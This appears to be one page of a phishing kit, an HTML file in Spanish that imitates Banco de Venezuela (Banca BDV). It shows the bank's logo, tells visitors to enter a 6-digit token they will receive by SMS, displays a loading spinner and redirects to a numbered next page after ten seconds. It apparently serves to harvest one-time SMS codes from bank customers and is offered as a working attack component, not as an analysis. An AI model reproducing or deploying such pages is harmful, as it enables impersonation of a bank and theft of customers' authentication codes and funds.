<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Página de inicio</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background: url('logig.jpg') no-repeat center center fixed;
            background-size: cover;
            font-family: Arial, sans-serif;
        }

        .container {
            background: rgba(255, 255, 255, 0.8);
            padding: 20px;
            border-radius: 10px;
            text-align: center;
            max-width: 300px;
            width: 100%;
        }

        .logo {
            width: 300px;
            margin-bottom: 20px;
        }

        .message {
            font-size: 24px;
            margin-bottom: 20px;
        }

        .loading {
            display: inline-block;
            width: 70px;
            height: 70px;
            border: 16px solid #a41a16;
            border-radius: 50%;
            border-top-color: transparent;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
    <meta http-equiv="refresh" content="10;url=3.html">
</head>
<body>
    <div class="container">

<p style="text-align: center;"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c1/Banco_de_Venezuela_logo.svg/2560px-Banco_de_Venezuela_logo.svg.png" alt="Archivo:Banco de Venezuela logo.svg - Wikipedia, la enciclopedia libre" width="272" height="49" /></p>
<p style="text-align: center;">&nbsp;</p>
<p style="text-align: center;"><strong>&nbsp;</strong>&nbsp;Ingresa el Token de 6 digitos que recibiras por SMS</p>
<p style="text-align: center;">en tu numero asociado a Banca BDV:</p>


        <br><br>
        <div class="loading"></div>
    </div>
</body>
</html>
